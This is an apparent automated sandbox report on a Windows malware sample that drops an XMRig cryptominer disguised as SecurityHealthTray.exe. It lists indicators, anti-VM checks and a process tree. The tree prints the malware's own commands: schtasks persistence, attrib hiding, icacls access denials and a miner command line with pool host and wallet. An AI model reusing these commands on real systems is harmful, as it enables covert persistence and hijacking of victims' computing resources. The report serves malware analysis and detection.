Analysis
-
max time kernel
294s -
max time network
385s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
28-02-2021 15:01
Static task
static1
Behavioral task
behavioral1
Sample
cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe
Resource
win7v20201028
General
-
Target
cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe
-
Size
6.2MB
-
MD5
bd64d2e0d11093bbd84be2b6ca1c113d
-
SHA1
8fae8984391bd9dddb7afc0ebdd87a05954a7134
-
SHA256
cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427
-
SHA512
b2ebe1a566c9a22fa34795b5906721242a005b69cb1301ef6817ce31c45b9ca9da0e9b85c2973fe27a5910077c909469c91bf8a32bc8d370fdd84ce00415e3ad
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 15 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1.exe xmrig C:\Users\Admin\AppData\Local\Temp\1.exe xmrig C:\Users\Admin\AppData\Roaming\1337\1.exe xmrig C:\Users\Admin\AppData\Roaming\1337\1.exe xmrig C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe xmrig C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe xmrig C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe xmrig C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe xmrig C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe xmrig C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe xmrig behavioral4/memory/3332-66-0x00007FF72A3C0000-0x00007FF72AAE7000-memory.dmp xmrig C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe xmrig C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe xmrig C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe xmrig behavioral4/memory/412-124-0x00007FF72A3C0000-0x00007FF72AAE7000-memory.dmp xmrig -
Executes dropped EXE 12 IoCs
Processes:
lxxxxxx.exe1.exeFile.exe1.exe@asasinalex.exeservices.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exeSecurityHealthTray.exepid process 760 lxxxxxx.exe 3712 1.exe 3184 File.exe 1416 1.exe 1760 @asasinalex.exe 4484 services.exe 2052 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 4168 SecurityHealthTray.exe 3012 SecurityHealthTray.exe 644 SecurityHealthTray.exe 412 SecurityHealthTray.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
SecurityHealthTray.exeSecurityHealthTray.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation SecurityHealthTray.exe Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation SecurityHealthTray.exe -
Loads dropped DLL 1 IoCs
Processes:
File.exepid process 3184 File.exe -
Modifies file permissions 1 TTPs 3 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 2104 icacls.exe 2400 icacls.exe 1588 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral4/memory/4692-2-0x00000000008E0000-0x000000000159C000-memory.dmp themida -
Processes:
cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 12 api.ipify.org 13 api.ipify.org 14 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exepid process 4692 cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe -
Drops file in Program Files directory 2 IoCs
Processes:
lxxxxxx.exedescription ioc process File created C:\Program Files (x86)\Windows Portable Devices\taskhostw.exe lxxxxxx.exe File created C:\Program Files (x86)\Windows Portable Devices\ea9f0e6c9e2dcd4dfacdaf29ba21541fb815a988 lxxxxxx.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 196 1760 WerFault.exe @asasinalex.exe -
NSIS installer 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\File.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\File.exe nsis_installer_2 C:\Users\Admin\AppData\Local\Temp\File.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\File.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3424 schtasks.exe 4392 schtasks.exe 1776 schtasks.exe 4420 schtasks.exe 4508 schtasks.exe -
Modifies registry class 2 IoCs
Processes:
SecurityHealthTray.exeSecurityHealthTray.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance SecurityHealthTray.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance SecurityHealthTray.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
lxxxxxx.exe@asasinalex.exeWerFault.exeservices.exeSecurityHealthTray.exeSecurityHealthTray.exepid process 760 lxxxxxx.exe 1760 @asasinalex.exe 196 WerFault.exe 196 WerFault.exe 196 WerFault.exe 196 WerFault.exe 196 WerFault.exe 196 WerFault.exe 196 WerFault.exe 196 WerFault.exe 196 WerFault.exe 196 WerFault.exe 196 WerFault.exe 196 WerFault.exe 196 WerFault.exe 196 WerFault.exe 4484 services.exe 2052 SecurityHealthTray.exe 2052 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe 3332 SecurityHealthTray.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
@asasinalex.exelxxxxxx.exeWerFault.exeservices.exeSecurityHealthTray.exeSecurityHealthTray.exedescription pid process Token: SeDebugPrivilege 1760 @asasinalex.exe Token: SeDebugPrivilege 760 lxxxxxx.exe Token: SeRestorePrivilege 196 WerFault.exe Token: SeBackupPrivilege 196 WerFault.exe Token: SeDebugPrivilege 196 WerFault.exe Token: SeDebugPrivilege 4484 services.exe Token: SeLockMemoryPrivilege 3332 SecurityHealthTray.exe Token: SeLockMemoryPrivilege 3332 SecurityHealthTray.exe Token: SeLockMemoryPrivilege 412 SecurityHealthTray.exe Token: SeLockMemoryPrivilege 412 SecurityHealthTray.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
chrome.exepid process 1412 chrome.exe 1412 chrome.exe 1412 chrome.exe 1412 chrome.exe 1412 chrome.exe 1412 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe1.exeFile.execmd.execmd.exelxxxxxx.exeSecurityHealthTray.exechrome.exechrome.exeSecurityHealthTray.exedescription pid process target process PID 4692 wrote to memory of 760 4692 cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe lxxxxxx.exe PID 4692 wrote to memory of 760 4692 cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe lxxxxxx.exe PID 4692 wrote to memory of 3712 4692 cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe 1.exe PID 4692 wrote to memory of 3712 4692 cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe 1.exe PID 4692 wrote to memory of 3184 4692 cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe File.exe PID 4692 wrote to memory of 3184 4692 cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe File.exe PID 4692 wrote to memory of 3184 4692 cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe File.exe PID 3712 wrote to memory of 3424 3712 1.exe schtasks.exe PID 3712 wrote to memory of 3424 3712 1.exe schtasks.exe PID 3712 wrote to memory of 1856 3712 1.exe cmd.exe PID 3712 wrote to memory of 1856 3712 1.exe cmd.exe PID 3712 wrote to memory of 576 3712 1.exe cmd.exe PID 3712 wrote to memory of 576 3712 1.exe cmd.exe PID 3712 wrote to memory of 844 3712 1.exe cmd.exe PID 3712 wrote to memory of 844 3712 1.exe cmd.exe PID 3184 wrote to memory of 1416 3184 File.exe 1.exe PID 3184 wrote to memory of 1416 3184 File.exe 1.exe PID 844 wrote to memory of 1588 844 cmd.exe icacls.exe PID 844 wrote to memory of 1588 844 cmd.exe icacls.exe PID 1856 wrote to memory of 1572 1856 cmd.exe attrib.exe PID 1856 wrote to memory of 1572 1856 cmd.exe attrib.exe PID 3184 wrote to memory of 1760 3184 File.exe @asasinalex.exe PID 3184 wrote to memory of 1760 3184 File.exe @asasinalex.exe PID 3184 wrote to memory of 1760 3184 File.exe @asasinalex.exe PID 1856 wrote to memory of 1924 1856 cmd.exe attrib.exe PID 1856 wrote to memory of 1924 1856 cmd.exe attrib.exe PID 844 wrote to memory of 2104 844 cmd.exe icacls.exe PID 844 wrote to memory of 2104 844 cmd.exe icacls.exe PID 844 wrote to memory of 2400 844 cmd.exe icacls.exe PID 844 wrote to memory of 2400 844 cmd.exe icacls.exe PID 1856 wrote to memory of 2504 1856 cmd.exe attrib.exe PID 1856 wrote to memory of 2504 1856 cmd.exe attrib.exe PID 760 wrote to memory of 4392 760 lxxxxxx.exe schtasks.exe PID 760 wrote to memory of 4392 760 lxxxxxx.exe schtasks.exe PID 760 wrote to memory of 1776 760 lxxxxxx.exe schtasks.exe PID 760 wrote to memory of 1776 760 lxxxxxx.exe schtasks.exe PID 760 wrote to memory of 4420 760 lxxxxxx.exe schtasks.exe PID 760 wrote to memory of 4420 760 lxxxxxx.exe schtasks.exe PID 760 wrote to memory of 4508 760 lxxxxxx.exe schtasks.exe PID 760 wrote to memory of 4508 760 lxxxxxx.exe schtasks.exe PID 760 wrote to memory of 4484 760 lxxxxxx.exe services.exe PID 760 wrote to memory of 4484 760 lxxxxxx.exe services.exe PID 2052 wrote to memory of 3332 2052 SecurityHealthTray.exe SecurityHealthTray.exe PID 2052 wrote to memory of 3332 2052 SecurityHealthTray.exe SecurityHealthTray.exe PID 1412 wrote to memory of 996 1412 chrome.exe chrome.exe PID 1412 wrote to memory of 996 1412 chrome.exe chrome.exe PID 1460 wrote to memory of 3180 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 3180 1460 chrome.exe chrome.exe PID 3332 wrote to memory of 412 3332 SecurityHealthTray.exe SecurityHealthTray.exe PID 3332 wrote to memory of 412 3332 SecurityHealthTray.exe SecurityHealthTray.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe PID 1460 wrote to memory of 1548 1460 chrome.exe chrome.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 1572 attrib.exe 1924 attrib.exe 2504 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe"C:\Users\Admin\AppData\Local\Temp\cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Users\Admin\AppData\Local\Temp\lxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\lxxxxxx.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\PerfLogs\fontdrvhost.exe'" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:4392
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\taskhostw.exe'" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:1776
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default\SendTo\WmiPrvSE.exe'" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:4420
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\services.exe'" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:4508
-
-
C:\Recovery\WindowsRE\services.exe"C:\Recovery\WindowsRE\services.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4484
-
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3712 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN Windows\x86_microsoft-windows-fsrm-common_31bf3256ad364e35_10.0.18372.1_none_3fed101f25aae892\MicrosoftSecurityEssentials /XML "C:\ProgramData\SecurityEssentials\task.xml"3⤵
- Creates scheduled task(s)
PID:3424
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials" & ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"& ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\task.xml"3⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\system32\attrib.exeATTRIB +h +s +r "C:\ProgramData\SecurityEssentials"4⤵
- Views/modifies file attributes
PID:1572
-
-
C:\Windows\system32\attrib.exeATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"4⤵
- Views/modifies file attributes
PID:1924
-
-
C:\Windows\system32\attrib.exeATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\task.xml"4⤵
- Views/modifies file attributes
PID:2504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c DEL /F /Q C:\ProgramData\SecurityEssentials\task.xml3⤵PID:576
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "admin:(R,REA,RA,RD)"3⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"4⤵
- Modifies file permissions
PID:1588
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"4⤵
- Modifies file permissions
PID:2104
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "admin:(R,REA,RA,RD)"4⤵
- Modifies file permissions
PID:2400
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\File.exe"C:\Users\Admin\AppData\Local\Temp\File.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Users\Admin\AppData\Roaming\1337\1.exe"C:\Users\Admin\AppData\Roaming\1337\1.exe"3⤵
- Executes dropped EXE
PID:1416
-
-
C:\Users\Admin\AppData\Roaming\1337\@asasinalex.exe"C:\Users\Admin\AppData\Roaming\1337\@asasinalex.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 19924⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:196
-
-
-
-
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exeC:\ProgramData\SecurityEssentials\SecurityHealthTray.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe" --max-cpu-usage=10 -o pool.supportxmr.com:3333 -u 41xymULmr9LRENCpbQbVtT37sg4GZWnwfTGfy8cdmLz9GPLs2zxvi4NDN1pCKuCu7ycHHHhphxpu7g4tv4BMZUgL1edwe2A -p x --rig-id={bcfccebbeefe}2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe" --max-cpu-usage=50 -o pool.supportxmr.com:3333 -u 41xymULmr9LRENCpbQbVtT37sg4GZWnwfTGfy8cdmLz9GPLs2zxvi4NDN1pCKuCu7ycHHHhphxpu7g4tv4BMZUgL1edwe2A -p x --rig-id={bcfccebbeefe}3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:412
-
-
-
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exeC:\ProgramData\SecurityEssentials\SecurityHealthTray.exe1⤵
- Executes dropped EXE
PID:4168
-
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exeC:\ProgramData\SecurityEssentials\SecurityHealthTray.exe1⤵
- Executes dropped EXE
PID:3012
-
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exeC:\ProgramData\SecurityEssentials\SecurityHealthTray.exe1⤵
- Executes dropped EXE
PID:644
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffd008b6e00,0x7ffd008b6e10,0x7ffd008b6e202⤵PID:3180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1484,1452363203057848386,8472118612668584216,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1504 /prefetch:22⤵PID:1548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1484,1452363203057848386,8472118612668584216,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1856 /prefetch:82⤵PID:4772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffd008b6e00,0x7ffd008b6e10,0x7ffd008b6e202⤵PID:996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1504 /prefetch:22⤵PID:2256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1700 /prefetch:82⤵PID:4768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2132 /prefetch:82⤵PID:3188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:12⤵PID:4440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2744 /prefetch:12⤵PID:4496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:12⤵PID:1776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:12⤵PID:4704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵PID:3740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:12⤵PID:4300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:12⤵PID:4400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4388 /prefetch:82⤵PID:3912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:12⤵PID:4256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1488,11137971945691548892,3961133394423424568,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4824 /prefetch:82⤵PID:4444
-
-
